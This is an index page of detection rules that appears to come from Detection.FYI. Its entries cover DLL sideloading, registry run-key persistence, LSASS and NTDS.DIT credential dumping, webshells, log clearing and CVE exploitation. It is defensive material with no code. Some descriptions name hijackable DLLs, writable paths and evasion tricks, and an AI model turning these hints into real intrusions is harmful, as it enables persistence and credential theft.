Detection.FYI
  • APT27 - Emissary Panda Activity

    May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.g0027 detection.emerging-threats

    Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
  • Aruba Network Service Potential DLL Sideloading

    May 15, 2025 · attack.privilege-escalation attack.persistence attack.t1574.001

    Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
  • Creation Of Non-Existent System DLL

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
  • DHCP Callout DLL Installation

    May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.t1112

    Detects the installation of a Callout DLL via the CalloutDlls and CalloutEnabled parameters in the Registry, which can be used to execute code in the context of the DHCP server (restart required)
  • DHCP Server Error Failed Loading the CallOut DLL

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded
  • DHCP Server Loaded the CallOut DLL

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
  • Diamond Sleet APT DLL Sideloading Indicators

    May 15, 2025 · attack.defense-evasion attack.t1574.001 detection.emerging-threats

    Detects DLL sideloading activity seen used by Diamond Sleet APT
  • DLL Names Used By SVR For GraphicalProton Backdoor

    May 15, 2025 · attack.defense-evasion attack.t1574.001 detection.emerging-threats

    Hunts known SVR-specific DLL names.
  • DLL Search Order Hijacking Via Additional Space in Path

    May 15, 2025 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.001

    Detects when an attacker creates a folder structure similar to Windows system folders (such as Windows, Program Files...) but with an additional space, in order to trick the DLL load search order and perform a "DLL Search Order Hijacking" attack
  • DLL Sideloading by VMware Xfer Utility

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects execution of the VMware Xfer utility (VMwareXferlogs.exe) from a non-default directory, which may be an attempt to sideload an arbitrary DLL
  • DLL Sideloading Of ShellChromeAPI.DLL

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary, which in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
  • DNS Server Error Failed Loading the ServerLevelPluginDLL

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
  • Fax Service DLL Search Order Hijack

    May 15, 2025 · attack.persistence attack.defense-evasion attack.t1574.001

    The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
  • Lazarus APT DLL Sideloading Activity

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001 attack.g0032 detection.emerging-threats

    Detects sideloading of trojanized DLLs used in a Lazarus APT campaign against a Spanish aerospace company
  • Malicious DLL File Dropped in the Teams or OneDrive Folder

    May 15, 2025 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.001

    Detects creation of a malicious DLL file in the location where the OneDrive or Teams applications reside. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
  • Microsoft Defender Blocked from Loading Unsigned DLL

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects the Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs, which may be an attempt to sideload an arbitrary DLL
  • Microsoft Office DLL Sideload

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location
  • New DNS ServerLevelPluginDll Installed

    May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.t1112

    Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll parameter in the registry, which can be used to execute code in the context of the DNS server (restart required)
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

    May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.t1112

    Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll parameter in the registry, which can be used to execute code in the context of the DNS server (restart required)
  • Potential 7za.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "7za.dll"
  • Potential Antivirus Software DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.
  • Potential appverifUI.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "appverifUI.dll"
  • Potential AVKkid.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "AVKkid.dll"
  • Potential Azure Browser SSO Abuse

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects abuse of Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user.
  • Potential CCleanerDU.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "CCleanerDU.dll"
  • Potential CCleanerReactivator.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "CCleanerReactivator.dll"
  • Potential Chrome Frame Helper DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "chrome_frame_helper.dll"
  • Potential DLL Sideloading Of DBGCORE.DLL

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects DLL sideloading of "dbgcore.dll"
  • Potential DLL Sideloading Of DBGHELP.DLL

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "dbghelp.dll"
  • Potential DLL Sideloading Of DbgModel.DLL

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects potential DLL sideloading of "DbgModel.dll"
  • Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
  • Potential DLL Sideloading Of MpSvc.DLL

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects potential DLL sideloading of "MpSvc.dll".
  • Potential DLL Sideloading Of MsCorSvc.DLL

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects potential DLL sideloading of "mscorsvc.dll".
  • Potential DLL Sideloading Of Non-Existent DLLs From System Folders

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
  • Potential DLL Sideloading Via ClassicExplorer32.dll

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
  • Potential DLL Sideloading Via comctl32.dll

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading using comctl32.dll to obtain system privileges
  • Potential DLL Sideloading Via DeviceEnroller.EXE

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
  • Potential DLL Sideloading Via JsSchHlp

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading using the JUSTSYSTEMS Japanese word processor
  • Potential DLL Sideloading Via VMware Xfer

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects loading of a DLL by the VMware Xfer utility from a non-default directory, which may be an attempt to sideload an arbitrary DLL
  • Potential EACore.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "EACore.dll"
  • Potential Edputil.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "edputil.dll"
  • Potential Goopdate.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
  • Potential Iviewers.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
  • Potential Libvlc.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
  • Potential Mfdetours.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "mfdetours.dll". "mftrace.exe" can be abused to attach to an arbitrary process and force-load any DLL named "mfdetours.dll" from the current working directory.
  • Potential Mpclient.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
  • Potential Mpclient.DLL Sideloading Via Defender Binaries

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
  • Potential PlugX Activity

    May 15, 2025 · attack.s0013 attack.defense-evasion attack.t1574.001 detection.emerging-threats

    Detects the execution, from an uncommon location, of an executable that is typically used by PlugX for DLL side loading
  • Potential Python DLL SideLoading

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects potential DLL sideloading of Python DLL files.
  • Potential Raspberry Robin Aclui Dll SideLoading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001 detection.emerging-threats

    Detects potential sideloading of a malicious "aclui.dll" by OleView. This behavior was observed in Raspberry Robin variants reported by Check Point Research in February 2024.
  • Potential Rcdll.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of rcdll.dll
  • Potential RjvPlatform.DLL Sideloading From Default Location

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
  • Potential RjvPlatform.DLL Sideloading From Non-Default Location

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
  • Potential RoboForm.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
  • Potential ShellDispatch.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "ShellDispatch.dll"
  • Potential SmadHook.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
  • Potential SolidPDFCreator.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "SolidPDFCreator.dll"
  • Potential System DLL Sideloading From Non System Locations

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
  • Potential Vivaldi_elf.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "vivaldi_elf.dll"
  • Potential Waveedit.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
  • Potential Wazuh Security Platform DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
  • Potential WWlib.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of "wwlib.dll"
  • Potentially Suspicious Child Process of KeyScrambler.exe

    May 15, 2025 · attack.execution attack.defense-evasion attack.privilege-escalation attack.t1203 attack.t1574.001

    Detects potentially suspicious child processes of KeyScrambler.exe
  • Renamed Vmnat.exe Execution

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects a renamed vmnat.exe or a portable version that can be used for DLL side-loading
  • Suspicious GUP Usage

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
  • Suspicious Unsigned Thor Scanner Execution

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects loading and execution of an unsigned THOR scanner binary.
  • Tasks Folder Evasion

    May 15, 2025 · attack.defense-evasion attack.persistence attack.execution attack.t1574.001

    The Tasks folders in System32 and SysWOW64 are globally writable paths. Adversaries can take advantage of this to load or influence any script host or any .NET application in Tasks, causing a custom assembly to be loaded and executed inside cscript, wscript, regsvr32, mshta or eventvwr
  • Third Party Software DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects DLL sideloading of DLLs that are part of third party software (Zoom, Discord, etc.)
  • UAC Bypass With Fake DLL

    May 15, 2025 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1548.002 attack.t1574.001

    Detects attempts to load dismcore.dll after dropping it
  • Unsigned Binary Loaded From Suspicious Location

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations
  • Unsigned Mfdetours.DLL Sideloading

    May 15, 2025 · attack.defense-evasion attack.privilege-escalation attack.t1574.001

    Detects DLL sideloading of an unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force-load any DLL named "mfdetours.dll" from the current working directory.
  • Unsigned Module Loaded by ClickOnce Application

    May 15, 2025 · attack.persistence attack.t1574.001

    Detects an unsigned module loaded by a ClickOnce application.
  • VMGuestLib DLL Sideload

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
  • VMMap Signed Dbghelp.DLL Potential Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
  • VMMap Unsigned Dbghelp.DLL Potential Sideloading

    May 15, 2025 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001

    Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
  • Winnti Malware HK University Campaign

    May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.g0044 detection.emerging-threats

    Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities
  • Winnti Pipemon Characteristics

    May 15, 2025 · attack.defense-evasion attack.t1574.001 attack.g0044 detection.emerging-threats

    Detects specific process characteristics of Winnti Pipemon malware reported by ESET
  • Xwizard.EXE Execution From Non-Default Location

    May 15, 2025 · attack.defense-evasion attack.t1574.001

    Detects the execution of the Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to sideload a custom version of "xwizards.dll".
  • Potentially Suspicious WDAC Policy File Creation

    May 12, 2025 · attack.defense-evasion

    Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes, which could be abused by an attacker to block EDR/AV components while allowing their own malicious code to run on the system.
  • Direct Autorun Keys Modification

    May 12, 2025 · attack.persistence attack.t1547.001

    Detects direct modification of an autostart extensibility point (ASEP) in the registry using reg.exe.
  • New RUN Key Pointing to Suspicious Folder

    May 12, 2025 · attack.persistence attack.t1547.001

    Detects a suspicious new RUN key entry pointing to an executable in a suspicious folder
  • Potential Persistence Attempt Via Run Keys Using Reg.EXE

    May 12, 2025 · attack.persistence attack.t1547.001

    Detects suspicious use of the reg.exe command line tool to add an entry to a RUN key in the Registry
  • Suspicious Autorun Registry Modified via WMI

    May 12, 2025 · attack.execution attack.persistence attack.t1547.001 attack.t1047

    Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.
  • Suspicious Powershell In Registry Run Keys

    May 12, 2025 · attack.persistence attack.t1547.001

    Detects potential PowerShell commands or code within registry run keys
  • Suspicious PowerShell Invocations - Specific

    May 12, 2025 · attack.execution attack.t1059.001

    Detects suspicious PowerShell invocation command parameters
  • Suspicious PowerShell Invocations - Specific - PowerShell Module

    May 12, 2025 · attack.execution attack.t1059.001

    Detects suspicious PowerShell invocation command parameters
  • Suspicious Run Key from Download

    May 12, 2025 · attack.persistence attack.t1547.001

    Detects suspicious RUN keys created by software located in the Downloads folder or in temporary Outlook/Internet Explorer directories
  • CreateDump Process Dump

    Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access

    Detects uses of the createdump.exe LOLBIN utility to dump process memory
  • DumpMinitool Execution

    Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access

    Detects the use of "DumpMinitool.exe", a tool that allows dumping process memory via "MiniDumpWriteDump"
  • HackTool - HandleKatz Duplicating LSASS Handle

    Apr 25, 2025 · attack.execution attack.t1106 attack.defense-evasion attack.t1003.001 attack.credential-access

    Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
  • HackTool - XORDump Execution

    Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access

    Detects suspicious use of the XORDump process memory dumping utility
  • Potential SysInternals ProcDump Evasion

    Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access

    Detects uses of the SysInternals ProcDump utility in which ProcDump or its output is renamed, or a dump file is moved or copied under a different name
  • Procdump Execution

    Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access

    Detects usage of the SysInternals Procdump utility
  • Renamed CreateDump Utility Execution

    Apr 25, 2025 · attack.defense-evasion attack.t1036 attack.t1003.001 attack.credential-access

    Detects uses of a renamed legitimate createdump.exe LOLBIN utility to dump process memory
  • Suspicious DumpMinitool Execution

    Apr 25, 2025 · attack.defense-evasion attack.credential-access attack.t1036 attack.t1003.001

    Detects suspicious ways to use the "DumpMinitool.exe" binary
  • Bitbucket User Permissions Export Attempt

    Apr 25, 2025 · attack.reconnaissance attack.collection attack.discovery attack.t1213 attack.t1082 attack.t1591.004

    Detects a user permission data export attempt.
  • Chopper Webshell Process Pattern

    Apr 25, 2025 · attack.persistence attack.discovery attack.t1505.003 attack.t1018 attack.t1033 attack.t1087

    Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells
  • Exports Critical Registry Keys To a File

    Apr 25, 2025 · attack.exfiltration attack.discovery attack.t1012

    Detects the export of a critical Registry key to a file.
  • Exports Registry Key To a File

    Apr 25, 2025 · attack.exfiltration attack.discovery attack.t1012

    Detects the export of the target Registry key to a file.
  • HackTool - SharpUp PrivEsc Tool Execution

    Apr 25, 2025 · attack.privilege-escalation attack.discovery attack.execution attack.t1615 attack.t1569.002 attack.t1574.005

    Detects the use of SharpUp, a tool for local privilege escalation
  • HackTool - winPEAS Execution

    Apr 25, 2025 · attack.privilege-escalation attack.discovery attack.t1082 attack.t1087 attack.t1046

    WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz.

  • SharpHound Recon Sessions

    Apr 25, 2025 · attack.discovery attack.t1033

    Detects remote RPC calls used by SharpHound to map remote connections and local group membership.

  • Webshell Detection With Command Line Keywords

    Apr 25, 2025 · attack.persistence attack.discovery attack.t1505.003 attack.t1018 attack.t1033 attack.t1087

    Detects certain command line parameters often used during reconnaissance activity via web shells

  • Webshell Hacking Activity Patterns

    Apr 25, 2025 · attack.persistence attack.discovery attack.t1505.003 attack.t1018 attack.t1033 attack.t1087

    Detects certain parent-child process patterns found in cases in which a web shell is used to perform credential dumping or exfiltration activities on a compromised system.

  • Suspicious CrushFTP Child Process

    Apr 17, 2025 · attack.initial-access attack.execution attack.t1059.001 attack.t1059.003 attack.t1190 cve.2025-31161 detection.emerging-threats

    Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.

  • Suspicious Process Spawned by CentreStack Portal AppPool

    Apr 17, 2025 · attack.execution attack.t1059.003 attack.t1505.003 cve.2025-30406 detection.emerging-threats

    Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406)

  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC

    Apr 17, 2025 · attack.execution attack.lateral-movement attack.t1210 cve.2020-1472 detection.emerging-threats

    Detects the execution of the commonly used ZeroLogon PoC executable.

  • Hiding User Account Via SpecialAccounts Registry Key - CommandLine

    Apr 17, 2025 · attack.t1564.002

    Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide a user account from being listed on the logon screen.

  • Obfuscated PowerShell OneLiner Execution

    Apr 17, 2025 · attack.defense-evasion attack.execution attack.t1059.001 attack.t1562.001

    Detects the execution of a specific OneLiner to download and execute PowerShell modules in memory.

  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1

    Apr 17, 2025 · attack.defense-evasion

    Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity.

  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2

    Apr 17, 2025 · attack.defense-evasion

    Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity.

  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3

    Apr 17, 2025 · attack.defense-evasion

    Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity.

  • Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4

    Apr 17, 2025 · attack.defense-evasion

    Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity.

  • Potential Tampering With RDP Related Registry Keys Via Reg.EXE

    Apr 17, 2025 · attack.defense-evasion attack.lateral-movement attack.t1021.001 attack.t1112

    Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values

  • Scheduled Task Executing Encoded Payload from Registry

    Apr 17, 2025 · attack.execution attack.persistence attack.t1053.005 attack.t1059.001

    Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.

  • Suspicious Eventlog Clear

    Apr 16, 2025 · attack.defense-evasion attack.t1070.001

    Detects usage of known PowerShell cmdlets such as "Clear-EventLog" to clear the Windows event logs.

  • Suspicious Eventlog Clearing or Configuration Change Activity

    Apr 16, 2025 · attack.defense-evasion attack.t1070.001 attack.t1562.002 car.2016-04-002

    Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique has been seen used by threat actors and ransomware strains in order to evade defenses.

  • Potential Product Class Reconnaissance Via Wmic.EXE

    Apr 16, 2025 · attack.execution attack.t1047 attack.discovery attack.t1082

    Detects the execution of WMIC in order to get a list of firewall, antivirus and antispyware products. Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.

  • Potential Browser Data Stealing

    Apr 16, 2025 · attack.credential-access attack.t1555.003

    Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

  • Suspicious LNK Command-Line Padding with Whitespace Characters

    Apr 16, 2025 · attack.initial-access attack.execution attack.t1204.002

    Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D). Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary. The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks. This rule flags suspicious use of such padding observed in real-world attacks.

  • DarkGate - Drop DarkGate Loader In C:\Temp Directory

    Apr 16, 2025 · attack.execution attack.t1059 detection.emerging-threats

    Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.

  • File Download Via Nscurl - MacOS

    Apr 16, 2025 · attack.defense-evasion attack.command-and-control attack.t1105

    Detects the execution of the nscurl utility in order to download files.

  • File Recovery From Backup Via Wbadmin.EXE

    Apr 16, 2025 · attack.impact attack.t1490

    Detects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.

  • Launch Agent/Daemon Execution Via Launchctl

    Apr 16, 2025 · attack.execution attack.persistence attack.t1569.001 attack.t1543.001 attack.t1543.004

    Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.

  • LSASS Process Reconnaissance Via Findstr.EXE

    Apr 16, 2025 · attack.credential-access attack.t1552.006

    Detects findstr commands that include the keyword lsass, which indicates reconnaissance activity for the LSASS process PID.

  • Network Communication Initiated To Portmap.IO Domain

    Apr 16, 2025 · attack.t1041 attack.command-and-control attack.t1090.002 attack.exfiltration

    Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors

  • Network Connection Initiated To Cloudflared Tunnels Domains

    Apr 16, 2025 · attack.exfiltration attack.command-and-control attack.t1567.001

    Detects network connections to Cloudflared tunnel domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

  • New File Exclusion Added To Time Machine Via Tmutil - MacOS

    Apr 16, 2025 · attack.impact attack.t1490

    Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.

  • New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application

    Apr 16, 2025 · attack.defense-evasion attack.t1562.004

    Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.

  • New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE

    Apr 16, 2025 · attack.defense-evasion attack.t1562.004

    Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule".

  • Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock

    Apr 16, 2025 · attack.credential-access attack.discovery attack.t1040

    Detects the execution of PowerShell scripts with calls to the "Start-NetEventSession" cmdlet, which allows an attacker to start event and packet capture for a network event session. Adversaries may attempt to capture network traffic to gather information over the course of an operation. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.

  • Potential Suspicious Browser Launch From Document Reader Process

    Apr 16, 2025 · attack.execution attack.t1204.002

    Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe, Microsoft Office, etc., and connects to a web application over HTTP(S), which could indicate a possible phishing attempt.

  • Potentially Suspicious Malware Callback Communication - Linux

    Apr 16, 2025 · attack.persistence attack.command-and-control attack.t1571

    Detects programs that connect to known malware callback ports based on threat intelligence reports.

  • Potentially Suspicious Usage Of Qemu

    Apr 16, 2025 · attack.command-and-control attack.t1090 attack.t1572

    Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.

  • Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location

    Apr 16, 2025 · attack.defense-evasion attack.t1218

    Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.

  • Sensitive File Dump Via Wbadmin.EXE

    Apr 16, 2025 · attack.credential-access attack.t1003.003

    Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.

  • Sensitive File Recovery From Backup Via Wbadmin.EXE

    Apr 16, 2025 · attack.credential-access attack.t1003.003

